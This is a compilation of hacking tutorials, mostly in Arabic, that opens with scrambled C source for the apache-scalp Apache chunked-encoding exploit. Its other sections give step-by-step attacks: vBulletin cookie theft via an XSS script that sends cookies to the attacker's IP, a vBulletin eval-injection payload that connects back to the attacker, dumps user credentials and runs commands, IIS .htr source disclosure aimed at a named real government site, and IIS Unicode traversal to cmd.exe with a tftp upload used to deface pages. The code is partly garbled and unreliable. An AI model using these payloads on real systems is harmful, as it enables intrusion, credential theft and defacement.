\\x68\\\\x68\\\\x2f\\\\x2f\\\\x62\\\\x69\\\\x89 \\\
"\\\xe3\\\\x50\\
\x53\\\\x89\\\\xe1\\\\x50\\\\x51\\\\x53\\\\x50\\\\ "\\\
;"\\\xb0\\\\x3b\\\\xcd\\\\x80\\\\xcc \\\
;
} struct
/* char *type; /* description for newbie penetrator
/* !int delta; /* delta thingie
/* u_long retaddr; /* return address
/* int repretaddr; /* we repeat retaddr thiz many times in the buffer
/* int repzero; /* and \\\\0\\'z this many times
!targets[] = { // hehe, yes theo, that say OpenBSD here {
,{ FreeBSD 4.5 x86 / Apache/1.3.23 (Unix)\\\", -150, 0x80f3a00, 6, 36"\\\ }
,{ FreeBSD 4.5 x86 / Apache/1.3.23 (Unix)\\\", -150, 0x80a7975, 6, 36"\\\ }
,{ OpenBSD 3.0 x86 / Apache 1.3.20\\\", -146, 0xcfa00, 6, 36"\\\ }
,{ OpenBSD 3.0 x86 / Apache 1.3.22\\\", -146, 0x8f0aa, 6, 36"\\\ }
,{ OpenBSD 3.0 x86 / Apache 1.3.24\\\", -146, 0x90600, 6, 36"\\\ }
,{ OpenBSD 3.0 x86 / Apache 1.3.24 #2\\\", -146, 0x98a00, 6, 36"\\\ }
,{ OpenBSD 3.1 x86 / Apache 1.3.20\\\", -146, 0x8f2a6, 6, 36"\\\ }
,{ OpenBSD 3.1 x86 / Apache 1.3.23\\\", -146, 0x90600, 6, 36"\\\ }
,{ OpenBSD 3.1 x86 / Apache 1.3.24\\\", -146, 0x9011a, 6, 36"\\\ }
,{ OpenBSD 3.1 x86 / Apache 1.3.24 #2\\\", -146, 0x932ae, 6, 36"\\\ }
OpenBSD 3.1 x86 / Apache 1.3.24 PHP 4.2.1\\\", -146, 0x1d7a00, 6,"\\\ }
,{ 36
,{ NetBSD 1.5.2 x86 / Apache 1.3.12 (Unix)\\\", -90, 0x80eda00, 5, 42"\\\ }
,{ NetBSD 1.5.2 x86 / Apache 1.3.20 (Unix)\\\", -90, 0x80efa00, 5, 42 "\\\ }
,{ NetBSD 1.5.2 x86 / Apache 1.3.22 (Unix)\\\", -90, 0x80efa00, 5, 42 "\\\ }
,{ NetBSD 1.5.2 x86 / Apache 1.3.23 (Unix)\\\", -90, 0x80efa00, 5, 42 "\\\ }
,{ NetBSD 1.5.2 x86 / Apache 1.3.24 (Unix)\\\", -90, 0x80efa00, 5, 42 "\\\ }
;victim ,{
} (void usage(void
;int i
291
;("\\\0x080e0000/nbsd.\\\\n
printf(\\\" -d -nnn\\\\t\\\\tmemcpy() delta between s1 and addr to
;("\\\overwrite\\\\n
;("\\\printf(\\\" \\\\t\\\\t\\\\tTry -146/obsd, -150/fbsd, -90/nbsd.\\\\n
printf(\\\" -z #\\\\t\\\\t\\\\tNumbers of time to repeat \\\\\\\\0 in the
;("\\\buffer\\\\n
;("\\\printf(\\\" \\\\t\\\\t\\\\tTry 36 for openbsd/freebsd and 42 for netbsd\\\\n
printf(\\\" -r #\\\\t\\\\t\\\\tNumber of times to repeat retadd in the
;("\\\buffer\\\\n
;("\\\printf(\\\" \\\\t\\\\t\\\\tTry 6 for openbsd/freebsd and 5 for netbsd\\\\n
;("\\\printf(\\\" Optional stuff:\\\\n
printf(\\\" -w #\\\\t\\\\t\\\\tMaximum number of seconds to wait for
;("\\\shellcode reply\\\\n
printf(\\\" -c cmdz\\\\t\\\\tCommands to execute when our shellcode
;("\\\replies\\\\n
;("\\\printf(\\\" \\\\t\\\\t\\\\taka auto0wncmdz\\\\n
printf(\\\"\\\\nExamples will be published in upcoming apache-scalp-
;("\\\HOWTO.pdf\\\\n
;("\\\printf(\\\"\\\\n--- --- - Potential targets list - --- ---- ------- ------------\\\\n
;("\\\printf(\\\" ID / Return addr / Target specification\\\\n
(++for(i = 0; i < sizeof(targets)/sizeof(victim); i
;(printf(\\\"% 3d / 0x%.8lx / %s\\\\n\\\", i, targets[i].retaddr, targets[i].type
;(exit(1
{
(if(argc < 4
;()usage
;bruteforce = 0
;((memset(&victim, 0, sizeof(victim
} (while((i = getopt(argc, argv, \\\"t:b:d:h:w:c:r:z:o:\\\")) != -1
} (switch(i
/* required stuff */
:'\\case \\'h
;("\\\:"\\\ ,hostp = strtok(optarg
(if((portp = strtok(NULL, \\\":\\\")) == NULL
;"\\\portp = \\\"80
292
;break
/* predefined targets */
:'\\case \\'t
} ((if(atoi(optarg) >= sizeof(targets)/sizeof(victim
;("\\\printf(\\\"Invalid target\\\\n
;return -1
{
/* !bruteforce */
:'\\case \\'b
;++bruteforce
;"\\\victim.type = \\\"Custom target
;(victim.retaddr = strtoul(optarg, NULL, 16
printf(\\\"Using 0x%lx as the baseadress while bruteforcing..\\\\n\\\",
;(victim.retaddr
;break
:'\\case \\'d
;(victim.delta = atoi(optarg
;(printf(\\\"Using %d as delta\\\\n\\\", victim.delta
;break
:'\\case \\'r
;(victim.repretaddr = atoi(optarg
printf(\\\"Repeating the return address %d times\\\\n\\\",
;(victim.repretaddr
;break
:'\\case \\'z
;(victim.repzero = atoi(optarg
;(printf(\\\"Number of zeroes will be %d\\\\n\\\", victim.repzero
;break
:'\\case \\'o
;++bruteforce
} (switch(*optarg
:'\\case \\'f
;"\\\victim.type = \\\"FreeBSD
;victim.retaddr = 0x80a0000
;victim.delta = -150
;victim.repretaddr = 6
;victim.repzero = 36
;break
:'\\case \\'o
;"\\\victim.type = \\\"OpenBSD
293
;victim.retaddr = 0x80000
;victim.delta = -146
;victim.repretaddr = 6
;victim.repzero = 36
;break
:'\\case \\'n
;"\\\victim.type = \\\"NetBSD
;victim.retaddr = 0x080e0000
;victim.delta = -90
;victim.repretaddr = 5
;victim.repzero = 42
;break
:default
;("\\\printf(\\\"[-] Better luck next time!\\\\n
;break
{
;break
/* optional stuff */
:'\\case \\'w
;(sc_timeout = atoi(optarg
printf(\\\"Waiting maximum %d seconds for replies from
;(shellcode\\\\n\\\", sc_timeout
;break
:'\\case \\'c
;cmdz = optarg
;break
:default
;()usage
;break
{
{
294
;return -1
{
;((printf(\\\"%s\\\\n\\\", inet_ntoa(ia
;(()srand(getpid
;(signal(SIGPIPE, SIG_IGN
} (for(owned = 0, progress = 0;;victim.retaddr += RET_ADDR_INC
/* skip invalid return adresses */
((if(memchr(&victim.retaddr, 0x0a, 4) || memchr(&victim.retaddr, 0x0d, 4
;continue
;(fflush(stdout
} (if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0
;("\\\()perror(\\\"connect
;(exit(1
{
(if(!progress
;("\\\printf(\\\"connected!\\\\n
295
;("\\\-PUT_STRING(\\\"X
;(PUT_BYTES(PADSIZE_1, PADDING_1
;("\\\ :"\\\)PUT_STRING
} (++for (j = 0; j < victim.repretaddr; j
;p++ = victim.retaddr & 0xff*
;p++ = (victim.retaddr >> 8) & 0xff*
;p++ = (victim.retaddr >> 16) & 0xff*
;p++ = (victim.retaddr >> 24) & 0xff*
{
;(PUT_BYTES(victim.repzero, 0
;("\\\PUT_STRING(\\\"\\\\r\\\\n
{
;("\\\PUT_STRING(\\\"Transfer-Encoding: chunked\\\\r\\\\n
;(snprintf(buf, sizeof(buf) - 1, \\\"\\\\r\\\\n%x\\\\r\\\\n\\\", PADSIZE_2
;(PUT_STRING(buf
;(PUT_BYTES(PADSIZE_2, PADDING_2
;(snprintf(buf, sizeof(buf) - 1, \\\"\\\\r\\\\n%x\\\\r\\\\n\\\", victim.delta
;(PUT_STRING(buf
} (if(!shown_length
;((printf(\\\"[*] Exploit output is %u bytes\\\\n\\\", (unsigned int)(p - expbuf
;shown_length = 1
{
;++progress
(if((progress%70) == 0
;progress = 1
} (if(progress == 1
;(printf(\\\"\\\\r[*] Currently using retaddr 0x%lx\\\", victim.retaddr
(++ for(i = 0; i < 40; i
;("\\\ "\\\)printf
;("\\\printf(\\\"\\\\n
(if(bruteforce
;('\\;'\\)putchar
{
else
;('\\putchar(((rand()>>8)%2)? \\'P\\': \\'p
;(fflush(stdout
;responses = 0
} (while (1
;fd_set fds
;int n
;struct timeval tv
296
;tv.tv_sec = sc_timeout
;tv.tv_usec = 0
;(FD_ZERO(&fds
;(FD_SET(0, &fds
;(FD_SET(sock, &fds
;((memset(buf, 0, sizeof(buf
} (if(select(sock + 1, &fds, NULL, NULL, owned? NULL : &tv) > 0
} ((if(FD_ISSET(sock, &fds
(if((n = read(sock, buf, sizeof(buf) - 1)) < 0
;break
(if(n >= 1
}
(if(!owned
}
(++ for(i = 0; i < n; i
('\\if(buf[i] == \\'G
;++ responses
else
;responses = 0
(if(responses >= 2
}
;owned = 1
;(write(sock, \\\"O\\\", 1
;((write(sock, cmdz, strlen(cmdz
printf(\\\" it\\'s a TURKEY: type=%s, delta=%d, retaddr=0x%lx,
repretaddr=%d, repzero=%d\\\\n\\\", victim.type, victim.delta,
;(victim.retaddr, victim.repretaddr, victim.repzero
printf(\\\"Experts say this isn\\'t exploitable, so nothing will happen
;("\\\ :now
;(fflush(stdout
{
else {
;(write(1, buf, n
{
{
} ((if(FD_ISSET(0, &fds
(if((n = read(0, buf, sizeof(buf) - 1)) < 0
;(exit(1
;(write(sock, buf, n
{
(if(!owned
297
;break
{
;(free(expbuf
;(close(sock
(if(owned
;return 0
} (if(!bruteforce
;("\\\fprintf(stderr, \\\"Ooops.. hehehe!\\\\n
;return -1
{
{
;return 0
{
،،،انتهى
298
" حماية المنتديات "
>ةةةةة<
الكل يعرف لغة phpو التي يصمم بها المنتديات و الكل يعرف أيضا أنها مليئة بالثغرات الكبيرة
إليك مدير أي منتدى ) ( vbبعض الساسيات التي يتم بها حماية منتداك /
ً-1ل و قبل كل شيء المدير العام ضع مديرين إثنين واحد تكتب فيه المشاركات و تعديل المنتدى و كل شيء
و الخر للحتياط عندما يسرق المدير العام .
-2مي لوحة التحكم بكلمة سر أي إفتح ملف index.phpالموجود بـمجلد adminبواسطة المفكرة و
أضف عليه كود كلمة السر الذي هو /
>?php
;"LOGIN = "User$
;"PASSWORD = "Password$
299
-3غ قائمة العضاء لماذا ؟؟ مثل لو كان لديك 3000عضو ووضع الزائر الكريم قائمة العضاء و قعد
يفحط به أصبح هناك ضغط كبير على المنتدى قد تسألوني لماذا ل نلغي قائمة البحث !! لن البحث في النسخ
الجديدة يكون بأكثر من ثلث أحرف و بهذا لن يكون هناك أي ضغط .
-4تكثر فتح لغة HTMLفي المنتديات أي إفتحها بمنتدى واحد أو إثنين فقط لوجود الضرورة ..لماذا ؟؟
لنه يوجد كود هتمل يفسد جميع المواضيع التي تعتمد على هذه اللغة .
-5توقيع و ما أدراك ما التوقيع .إجعله فقط يخدم الصور أما الفلش و الصوت فل .
انتهى،،،
>ةةةةة<
---------
مقدمة :
---------
ملحظة :هذه الطريقة لست للـ vBulletinفقط !! يمكن ان تجربها على انواع اخرى من المنتديات .
----------
الثغرة :
---------
تنقسم طريقة العمل الى عدة اقسام ..أول بعض السكربتات الخبيثة التي تسرق الكوكيز بالضافة الى جعل
المنتدى يستقبل
بيانات من مكان خاطيء ..لكن يشترط ان يسمح المنتدى بأكواد الـ .. HTML
قم بكتابة موضوع جديد او رد )في منتدى يدعم الـ .. ( HTMLثم اكتب اي موضوع والصق بين السطور
هذا الكود :
>script>document.write('<img
<src="http://my_ip_address/'+document.cookie+'">';</script
وعندما يقوم شخص ما بقراءة محتوى الصفحة فان السكربت الذي قمنا بوضعه سيقوم بتنفيذ الوامر في
جهاز وقراءة جزء
من احد ملفات الكوكيز التي تحتوي على الباسورد الخاصة بالمنتدى ..ثم يقوم السكربت بتحويل هذه السطور
الى رقم
الي بي الذي قمنا بكتابته سابقا )مع ملحظة انه يجب ان يكون على جهازي سيرفر مثل IISاو Apache
او غيرها ( .
300
وبعد ان تتم العملية بنجاح قم بفتح ملف الـ Logالخاص بالسيرفر الذي يحتويه جهازك ..
مثال لو كان السيرفر اباتشي ..فتاح المجلد Apcheواختر logsواختر . Acces Log
ستجد جميع الوامر التي طلبتها من السيرفر ..إلخ
GET/ bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fb
ddf90622;%20sessionhash=a
4719cd620534914930b86839c4bb5f8;%20bbthreadview[54
%20bblastvi;1012444064=[20
sit=1011983161
اعتقد انك تعلم ما يجب ان تفعله بعد ذلك !! ادخل الى لوحة التحكم وافعل ما تشاء ! ..
------------
الحل
-----------
للحماية من هذه الثغرة قم باغلق الـ HTMLفي )المنتدى +الرسائل الخاصة +التواقيع +التقويم
( ... +
)واي منفذ يمكن من خلله وضع كود HTMLباي صورة كانت (
كما يجب اغل كود الـ .. IMGلنه ببساطة بامكانك استخدامه بدل كلمة > <scriptفاذا وضعت ><img
او > <Demonاو
اي كلمة اخرى فانه سيتم تنفيذ السكربت بشكل او باخر ...لذا كن حذرا واغلق هذه المنافذ .
. Be Secret .. Dont' be Lamer
انتهى،،،
301
"درس مفصل عن كيفية اختراق المنتديات وطرق حمايتها"
****************
1المنتديات وانواعه
تفضل هذا ثغرات بموقعهم اشوي شغل كمان تصل لقلبهم لاريد التطويل الن بس مثال لمن يفهمه
?http://www.vbulletin.org/index.php
<topic=<script>alert(document.cookie)</script
302
2
http://www.vbulletin.org/index.php?|
=forum/view.php&topic=../../../../../../../etc/passwd
********************
طريقة اختراقه
جميع الصدارات
بتذكرو يمكن بعضكم113 فلنبدي من صفر نسخة
وهذا، وهذا النوع من المنتديات يحب يركبه قليلين الخبره في أغلب الحيان، كلنا نعرف منتديات الفي بي
المنتدى هو المعروف عندنا العرب بكثره
A remote user may thus execute any PHP code and programs as the
web
server user, typically "nobody", start an interactive shell and try to
elevate their privilege. The configuration files are accessible for the
web server so the user can in any case access the MySQL database
.containing the forums and user information
DETAILS
=======
303
} ("if ($action=="faq
;(";("\".("eval("echo dovars(\"".gettemplate("faq
{
} (function gettemplate($templatename,$escape=1
gets a template from the db or from the local cache //
;global $templatecache,$DB_site
} (""=![if ($templatecache[$templatename
;[template=$templatecache[$templatename$
} else {
gettemp=$DB_site->query_first("SELECT template FROM template$
;("'".(WHERE title='". addslashes($templatename
;[template=$gettemp[template$
;templatecache[$templatename]=$template$
{
} (if ($escape==1
;(template=str_replace("\"","\\\"",$template$
{
;return $template
{
http://www.site.url/index.php?
action=faq&templatecache[faq]=hello+world
With this URL, you won't get the FAQ page, but just a blank page
."with the words "hello world
304
As if this wouldn't be bad enough, a remote user may as well pass a
value containing quotation marks and other symbols. Quotation marks
aren't always escaped as seen in the code above, in which case
index.php could end up executing code like
;("echo dovars("hello"world
The above example works with the "Lite" version. The commercial
versions
are vulnerable too, but details may differ. After a little experimenting
on the Jelsoft's test site I found some of the commercial versions also
.have an eval() problem with URL redirecting, e.g
http://www.site.url/member.php?acti...ypass&url=hello"world
http://www.site.url/search.php?
acti...s&templatecache[standardredirect]=hello"world
، تنفذ في السيرفرurl من الكلم هذا أنت ممكن ترسل أكواد خلف، تعرفون الكلم هذا ول داعي لترجمه
: جرب مثل، الغبيهhello+world تضعها بدل الكلمه
vb 113 or 115 ركب في جهازك ملقم ويب أي ملقم تحبه ممكن تركب عليه-1
( عندك في جهازك )طريقه فتح البورت تكون على مجازك90 أفتح البورت-2
هذا الى السيرفرurl أرسل الـ-3
search.php3?
action=simplesearch&query=searchthis&templatecache[standardredirec
t]="%29%3B%24fa="<%261";set_time_limit(substr("900",0,3));
%24fp=fsockopen(substr("IP.IP.IP.IP",0,12),substr("90",0,2),
%26%24errno,%26%24errstr,substr("900" ,0,3));if(!%24fp)
{}else{%24arr[200];fputs(%24fp,su
bstr("vhak1.0,%20- d%20downloads%20database,or%20press%20return
%20for
%20command%20line" ,0,63));%24va=fgets(%24fp,3);fputs(%24fp,
%24va);if
305
))strlen(%24va)>1
{include(substr("admin/config.php",0,16));include(substr("admin/config.
php3",0,17));mysql_connect(substr("%24servername",0,strlen(%24serve
rname)),substr("%24dbusername",0,strlen(%24dbusername)),substr("%
24dbpassword" ,0,strlen(%24dbpassword)));%24currenta=mysql_db_qu
*ery(substr("%24dbname",0,strlen(%24dbname)),substr("select%20
%20from%20user" ,0,18));while(%24res=mysql_fetch_array
%20(%24curre
))nta
{fputs(%24fp,"%24res[userid],");fputs(%24fp,"%24res[usergroupid],");fp
uts(%24fp,"%24res[password],");fputs(%24fp,"%24res
%24arr);%24str=exec(fgets(%24fp,substr("128",0,3)),
)%24arr);for(%24ir=substr("0",0,1);%24ir< sizeof(%24arr);%24ir%2B%2B
{fputs(%24fp,%24arr[%24
_ir]);fputs(%24fp,%24va);}}fclose(%24fp);}die(vhak
"finished_execution);echo%28
لحظ IP.IP.IP.IPهذه تحط مكانها رقم الي بي حقك ،ثم الحظ بعدها وجود الرقم 12وهذا تغيرها على
طول رقم الي بي ،مثل 127.0.0.1يكون طوله 9
ممكن أنت تخترع كود ثاني وترسله وتلحظ أنه يتنفذ ،ممكن ترسل كود يسجل لك أدمين ،هذا مثل ما صار
في ) arabteam2000.comأصدقائي طبعا( من باب التنبيه ،وكمان صار في c4arab.comو
طريق السلم و الثقافه ...وكثير من المنتديات ،بهدف التحذير وليس التخريب ،وواضح أنه عمل بسيط
يحتاج لشويه من التفكير ،أعتقد أهليز زمان صار فيه ،ولكن مسحت الداتالبيس وهذا سهل للغايه
المتطلبات ) WebServer :تركيب سيرفر على جهازك الشخصي( +متصفح انترنت )اكسبلورر( .
306
المستوى :متوسط
ملحظة :هذه الطريقة لست للـ vBulletinفقط !! يمكن ان تجربها على انواع اخرى من المنتديات .
----------
الثغرة :
---------
تنقسم طريقة العمل الى عدة اقسام ..أول بعض السكربتات الخبيثة التي تسرق الكوكيز بالضافة الى جعل
المنتدى يستقبل
بيانات من مكان خاطيء ..لكن يشترط ان يسمح المنتدى بأكواد الـ .. HTML
قم بكتابة موضوع جديد او رد )في منتدى يدعم الـ .. ( HTMLثم اكتب اي موضوع والصق بين السطور
هذا الكود :
>script>document.write('<img
<src="http://my_ip_address/'+document.cookie+'">';</script
وعندما يقوم شخص ما بقراءة محتوى الصفحة فان السكربت الذي قمنا بوضعه سيقوم بتنفيذ الوامر في
جهاز وقراءة جزء
من احد ملفات الكوكيز التي تحتوي على الباسورد الخاصة بالمنتدى ..ثم يقوم السكربت بتحويل هذه السطور
الى رقم
الي بي الذي قمنا بكتابته سابقا )مع ملحظة انه يجب ان يكون على جهازي سيرفر مثل IISاو Apache
او غيرها ( .
وبعد ان تتم العملية بنجاح قم بفتح ملف الـ Logالخاص بالسيرفر الذي يحتويه جهازك ..
مثال لو كان السيرفر اباتشي ..فتاح المجلد Apcheواختر logsواختر . Acces Log
ستجد جميع الوامر التي طلبتها من السيرفر ..إلخ
GET/ bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fb
ddf90622;%20sessionhash=a
4719cd620534914930b86839c4bb5f8;%20bbthreadview[54
%20bblastvi;1012444064=[20
sit=1011983161
307
ستجد عبارة " :أهل بعودتك يـا ) اسم الذي سرقت منه الكوكيز" (....
في هذه الحالة انت الن تستطيع التحكم بكل شي وكانك مدير المنتدى )الذي سرقت منه الكوكيز( ..
لكننا نحتاج الى كلمة المرور للدخول الى لوحة التحكم ..اذهب الى )التحكم( وقم بتعديل البريد اللكتروني الى
بريدك الخاص
وثم قم بتسجيل الخروج ..ثم اذهب الى اداة .. Forgot Passwordوعندها تستطيع استقبال بريد
يحتوي باسورد الدمن ..
*******************
يمكنك استخدام برنامج العقرب بيكون اسرع لمن لديه نسخ منه
الس كيو ال هي عبارة عن قاعد بيانات تحتوي على جداول واغلب المواقع التي تكون صفحاتها منتهية ب
ASPهي صفحات تسحب بياناتها
من قاعدة SQLوصفحات ASPممكن ان تكون كنز من المعلومات لختراق قواعد بيانات SQLوهذا
ماسوف اشير اليه لحقا ،و SQL
تتنصت على البورت 1433
ايضا مااريد ان اخبرك به ان ال SQLقد تحتوي على اكثر من قاعدة بيانات وكل قاعدة بيانات تحتوي على
عدد من الجداول يمكن
ان تتصور كبرقواعد بيانات SQLوالعدد الكبير من البيانات التى تحتويها .
اعرف انه قد اصابك الملل الن لكن استعد نشاطك من جديد فالطريق مازال طويل ...
هناك طرق عديدة للحصول على User name and Passwdمنها كما اسلف صفحات ال ASP
وملفات اخرى من نوع * sql.هناك ثغرات كثير يمكن
ان تحصل منها على كلمات المرور مثل ثغرة htr.+
كيف تستخدم هذه الثغرة :
308
http://target/page.asp+.htr
: targetالموقع الهدف
: Pageصفحة asp
: htr.+الثغرة
هذه الثغرة تقوم احيانا بفتح صفحة بيضاء لتحتوي على اي حرف ....اعرف انك سوف تتساءل مالفائدة
اذن منها الفائدة هو
خلف هذه الصفحة البيضاء اذهب الى View Sourceلكي ترى اوامر البرمجة الخاصة ب ASPالتى
ليمكن لك ان تراها في الوضع العادي :مثل
>%
<%
------------------------------------------------------------------
في الكود السابق ترى ان اسم المستخدم هو _LinuxRay
وكلمة السر هي 6666666
------------------------------------------------------------------
الشئ المضحك انه احيانا اذا كان هناك خطأ في صفحة ال ASPمثل التي :
هناك ملف ينتهي بامتداد * inc.هذا ملف يحتوي على اوامر يتم تنفيذها من جانب الملقم ويحتوي على اسم
المستخدم وكلمة المرور
اذن ماذا تنتظر قم بسحب هذا الملف وذلك باضافة اسم الملف في عنوان الموقع .
global.asa
309
global.asa++
beforemilion-global.asa
global.asa-
milion.sql
global-direct.asa
ليس من الضرورة ان تكون الملفات بهذه السماء لكن هذا هو المعتاد عليه من قبل مبرمجين SQL
global.asa+.htr
هناك ثغرة قديمة في IIS 3وهي ان تضيف بعد صفحة ASPهذا الرمز data$::كما يلي
file.asp::$data
هذه الثغرة لتعمل ال على IIS 3فل تتعب نفسك بتطبيقها فقط للعلم ل اكثر .
لقد اقتربنا من النهاية ...ماذا بعد الحصول على اسم المستخدم وكلمة المرور ؟؟
هناك عدة برامج تدخل على قاعدة البينات انا استخدم Visual interdev 6.0لكني مازلت افضل
استخدام البرنامج السهل ACCESS 2000
تحتاج فقط لثلث معلومات اسم الموقع او الي بي -اسم المستخدم -كلمة المرور
310
في السفل لختبار التصال بقاعدة البيانات اذا رأيت هذهTest Connection اضغط في البداية على
Test Connection Succeeded العبارة
.فمعناه ان التصال بقاعدة البيانات تم بنجاح
: يمكنك الن ان تختار اي قاعدة بيانات تريد الدخول اليها من القائمة المسندلة
Select the data base on the server
. او موافقOK واضغط على
: فئران التجارب
/http://www.moe.gov.sa موقع
http://www.moe.gov.sa/news_admin.asp
سترى مايلي
news_admin.asp, line 7/
http://www.moe.gov.sa/news_admin.asp+.htr
http://www.moe.gov.sa/database.inc
%>
<%
سارع بالتشبيك على قاعدة البيانات..... هل تعرف مالذي امام عينك الن انه اسم المستخدم وكلمة المرور
انا اعرف ان ل احد يحب مادة
. الكيمياء
311
فأر التجارب الثاني :
موقع /http://www.itsalat.com
*****************
سرفرات الويندوز ودوره في اختراق المنتديات
نحن الهكرز واي هكرز مبتدي يعرف ثغرات الويندوز جيدا دا
وهي نظام فاشل %80وثغراته بالالوف
ولانصح اي اخ لديه منتدي وموقع يستضيف سرفرات ويندوز راح اقلكم ليش بااثبتات
صور 2هو صورة لجمعية امريكي مهم وحجم قاعدات البيانات 1.5كيك يعني 15000ميك ويحتوي علي
خمسة ملين مشترك تم اختراقه البارحه بنفسي جاري تحميل الموقع لجاهزي كامل
1ثغرات الهتمل
2الفرونت بيج
3مخلفات الفتبي والستفاد منه كثير لهكرز
4ثغرات البرامج
6عدم تمكن حماية النظام %100
بسم ال نبدأ
توجد نقطة ضعف في الي اي اس 4او 5وهذه النقطة تستغل بطريقة سهلة جدًا
وتسمى هذه النقطة باليونيكود
ل ليحتاج الى خبرة عميقة في مجال اختراق المواقع وتنفيذها سه ً
ولكن نقف عند هذه النقطة للمبتئيدئن
المبتدئين عامًة يفكرون الن في اختراق عدة مواقع شهيرة بهذه الطريقة
ولكن ل هذه الطريقة غير مجدية مع المواقع الشهيرة او غير الشهيرة
لن نقطة الضعف هذه لتوجد ال في ويندوز الفين او ان تي
وأغلب المواقع الشهيرة تستخدم انظمة اليونكس واللنكس
أي ان ويندوز ان تي او الفين نظام حمايته محدودة وكل يوم تطلع ثغرات جديدة
لكن بوسع مدراء المواقع ايقاف نقطة ضعف من نقاط الضعاف الموجودة في الن تي
لكن بتلك الطريقة قد يكونون جعلو حاجزًا لهم من الهكرة
312
ولكن ليس دائماً
وتنفذ من داخل المتصفح
وطريقة تنفيذ الثغرة كالتي :
\:http://www.xxxxxx.com/scripts/..Á ../winnt/system32/cmd.exe?/c+dir+c
ركزو هنا الن بعد دوت كوم بدأت تنفيذ الثغرة
وبإمكانك أيضا دخول اي ملف وليس فقط رؤية السي :cهذه الثغرة تسمح لك بــ عرض جميع ملفات
وتوجد أكثر من ثغرة وهي
\:scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c/
\:scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c/
msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\/
\:%e0\%80\%af../winnt/system32/cmd.exe\?/c\+dir+c
وطريقة تنفيذها من المتصفح
ومكان تنفيذها بعد اسم الموقع
مثال :
+\http://www.xxxxx.com/à/€/à/€/à/€/¯....2/cmd.exe/?/c
أي بعد دوت كوم
بعض الناس يسألون مالذي يظهر او على اي شكل يظهر
الحل بسيط
Dirهذا المر لو قمت بكتابته في نافذة الدوس ستظهر لك الملفات
وطريقة ظهور الملفات في المتصفح تقريبا
بنفس طريقة الدوس
إذا نجحت في تنفيذ الثغرة واظهرت الملفات امامك فتبدأ في تنفيذالخطوة الثانية
الخطوة الثانية عمل ابلود للملف الذي تريد تحميله
وعمل البلود أيضًا ليحتاج الى خبرة
لكن هنالك شروط لكي تعمل ابلود
يجب التأكد من أن التي إف تي بي مثبت على الموقع الضحية
وللكي تتأكد إتبع التي
يجب الدخول على ملف السستم 32ولكي تدخله يجب أن تضيف بعض الكلمات على الثغرة التي نجحت في
تنفيذها
مثال:
\:http://www.xxxxxx.com/scripts/..Á ../winnt/system32/cmd.exe?/c+dir+c
هذه الثغرة عملت في الموقع المطلوب ورأيت الملفات
لحظ التغير
http://www.xxxxxx.com/scripts/..Á
\../winnt/system32/cmd.exe?/c+dir+c:\Winnt\Sytem32
ماوضع على الثغرة هو أسماء لملفات متواجدة داخل الويندوز \Winnt\Sytem32
أي يجب عليك الدخول على هذه الملفات لكي تتأكد
بعض القراء يتسالون .....الثغرة التي نستخدمها ليست متطابقة مع هذه الثغرة ولكن هذا ليس شرط
للتطابقها يجب عليك الدخول باي كان على مللف السستم
313
ممكن يكون احد القراء اشتغلت معاه هذه الثغرة
\:http://www.xxxxx.com/scripts/..ü€€€....exe?/c+dir+c
ويقول كيف ادخل على ملف السستم
الحل هو واحد يجب عليك إضافة اسماء الملفات لكي تدخل على السستم 32
اي بعد هذا المتداد
\:c+dir+cهنا تضيف أسماء الملفات
/http://www.xxxxx.com/scripts/..ü€€€...Winnt/System32
كما قلنا سابقَا لتحتاج الى خبرة
وبعد دخول ملف السستم ستظهر لك محتوياته
ويجب على آنذاك البحث عن برنامج يسمي
tftp.exeيعني دور على هذا البرنامج الين ماتلقاه وتتأكد من انه في الجهاز
لن هذا البرنامج يعتبر شرط لكي تعمل ابلود للصفحة
ولو لقيت البرنامج اتفاءل بالخير يعني بإذن ال تعبك ماهو رايح على الفاضي
.........................................................................................
والشرط الثاني هو
يجب أن يكون عندك برنامج التي إف تي بي
وهذا البرنامج تقدر تنزله من هذا العنوان
www.geocities.com/anorR1234/tftpd32.zip
\:Cوبعد ماتنزل البرنامج وتفك الضغط منه من الفضل إنك تحطه داخل الـ
وتحط أيضا البرامج أو الصفحة التي تريد أن تعمل لها أبلود في السي
تحطه في السي الى داخل جهازك مو الى دالخل الموقع
وتشغل البرنامج
tftp32.exeوتتركه يعمل الى أن تنتهى من مهمتك الساسية
\:Cأسمع كلمي وحط كل شي في
لنك لو حطيتها بإذن ال راح تنجح المهمه
-----------------------------------------------------------------
الن بدأنا في النقطة الخطرة وهي تحميل الملفات
مع العلم أني اقصد بالتحميل البلود
أي
أبلود = تحميل
مو تجميل
وتحميل الملفات طريقة معقدة نسبيًا بس أنا متفائل بالخير لني معتقد أنكم راح تفهمو
المهم نرجع لموضوعنا
المهم طريقة نسخ الملفات تضاف ايضًا الى المتصفح
وتضاف بهذه الطريقة
مثال :
\:http://www.xxxxx.com/scripts/..ü€€€....exe?/c+dir+c
تخيل الثغرة هذه اشتغلت معاك
ويجب عليك إنك تمسح بعض الضافات من الثغرة لكي تضيف امر النسخ
c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.htm /
يعني الى راح نمسحه من الثغرة بيكون هذه الضافة
\:c+dir+c/
عشان تظيف بدالها
c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.htm /
ولمن نظيف امر النسخ بيطلع لنا بهذا الطريقة
http://www.xxxxx.com/scripts/..ü€€€...xe?/c+tftp.exe+"-
